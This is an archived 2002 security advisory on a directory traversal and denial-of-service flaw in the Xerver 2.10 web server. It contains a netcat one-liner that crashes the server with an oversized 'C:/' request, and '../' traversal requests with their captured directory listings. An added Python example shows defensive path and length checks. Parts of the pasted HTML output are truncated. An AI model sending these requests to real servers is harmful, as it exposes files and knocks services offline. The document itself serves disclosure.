[NEWS] Xerver 2.10 Directory Traversal and DoS

From: support@securiteam.com
Date: 03/09/02

From: support@securiteam.com
To: list@securiteam.com
Date: Sat,  9 Mar 2002 00:30:00 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

Xerver 2.10 Directory Traversal and DoS


<http://www.javascript.nu/xerver/> Xerver Free Web Server is a tiny web
server allowing you to run CGI/perl scripts on your computer. Xerver is a
tiny, fast and free web server, but is still advanced and supports both
HTTP/1.1 and HTTP/1.0 and all HTTP methods (GET, POST and HEAD).

Xerver v2.1 suffers from a directory traversal vulnerability that allows
remote users to view directory listings, and from a DoS bug that lets a
remote user crash the web server.


Vulnerable systems:
Xerver v2.10 for Windows, Linux, BSD, Solaris, and MAC

Port 32123 is usually used for server configuration. It is possible to
crash the server remotely by requesting the URL "C:\" several times.

$ printf "GET /`perl -e 'print "C:/"x500000'`\r\n\r\n" |nc -vvn

Another bug enables any remote user to view directory listings using
standard web requests.

Example 1:
$ nc -vvn 80
(UNKNOWN) [] 80 (?) open
GET /unix/ALEX/Xerver2.10/../../../ HTTP/1.0
HTTP/1.1 200 OK
Date: March 6, 2002 8:52:51 PM CST
Server: Xerver_v2
Connection: close
Location: /
Content-Type: text/html

<HTML><HEAD><TITLE>Directory Listing for /</TITLE></HEAD><BODY
OR=black><FONT FACE="tahoma, arial, verdana"><H2>Directory Listing for
ONT><PRE> <B>File name File size&nbsp; Last modified</B>

Program Files
<A HREF="Program Files" STYLE="text-decoration: none;"><IMG
er" BORDER=0> Program Files</A>

<A HREF="RECYCLER" STYLE="text-decoration: none;"><IMG
SRC="/Image:showFolder" B

<A HREF="WINNT" STYLE="text-decoration: none;"><IMG
SRC="/Image:showFolder" BORD


Accessing the following URL:

Results in:

Directory Listing for /

    File name File size Last modified

 Documents and Settings
 My Downloads
 Program Files


Example 2:

$ nc -vvn 80
(UNKNOWN) [] 80 (?) open
GET /unix/ALEX/Xerver2.10/../../../WINNT/system32/ HTTP/1.0

The result is:

Directory Listing for /WINNT/system32/

File name File size Last modified
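
The two checks a server needs in order not to behave this way, shown as an added example that is not Xerver's code and not part of the advisory: refuse any ".." segment that would climb above the document root rather than silently clamping it, refuse drive-letter segments such as "C:/", and cap the request line before parsing it. DOCROOT, MAX_REQUEST_LINE and the function names are assumptions; the request paths used are the ones from the examples above plus constructed variants.

```python
# Added example (not Xerver code): path resolution and request-line guard
# exercised with the request shapes from this advisory.
import posixpath
import re
from urllib.parse import unquote

DOCROOT = "/srv/www/htdocs"   # assumed document root (hypothetical)
MAX_REQUEST_LINE = 8192       # assumed cap on a request line, in bytes

_DRIVE = re.compile(r"^[A-Za-z]:")   # a segment beginning like 'C:'


def resolve_under_docroot(request_path, docroot=DOCROOT):
    """Return the filesystem path for request_path, or None if it must be refused.

    Percent-decodes, treats '\\' like '/', walks the segments one by one and
    refuses any '..' that would climb above docroot instead of clamping it,
    and refuses drive-letter segments such as 'C:'.
    """
    path = unquote(request_path.split("?", 1)[0]).replace("\\", "/")
    stack = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not stack:
                return None          # would escape docroot: refuse, do not clamp
            stack.pop()
            continue
        if _DRIVE.match(seg):
            return None              # 'C:' is never a valid name below docroot
        stack.append(seg)
    return posixpath.join(docroot, *stack) if stack else docroot


def accept_request_line(line):
    """Length guard applied before any parsing (the DoS case above)."""
    return len(line) <= MAX_REQUEST_LINE


def check_request(line):
    """Minimal request-line handling: length guard, method check, path resolution."""
    if not accept_request_line(line):
        return None
    parts = line.decode("latin-1").split()
    if len(parts) < 2 or parts[0] not in ("GET", "HEAD", "POST"):
        return None
    return resolve_under_docroot(parts[1])
```

The traversal request from Example 2 resolves to a path that is still below DOCROOT (three ".." after three real segments), while one more ".." or any percent-encoded equivalent is refused outright, and the repeated "C:/" request is dropped on length alone.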


Vendor Response:
The vendor was notified.


The information has been provided by <mailto:al3xhernandez@ureach.com>
Alex Hernandez.


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com


The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.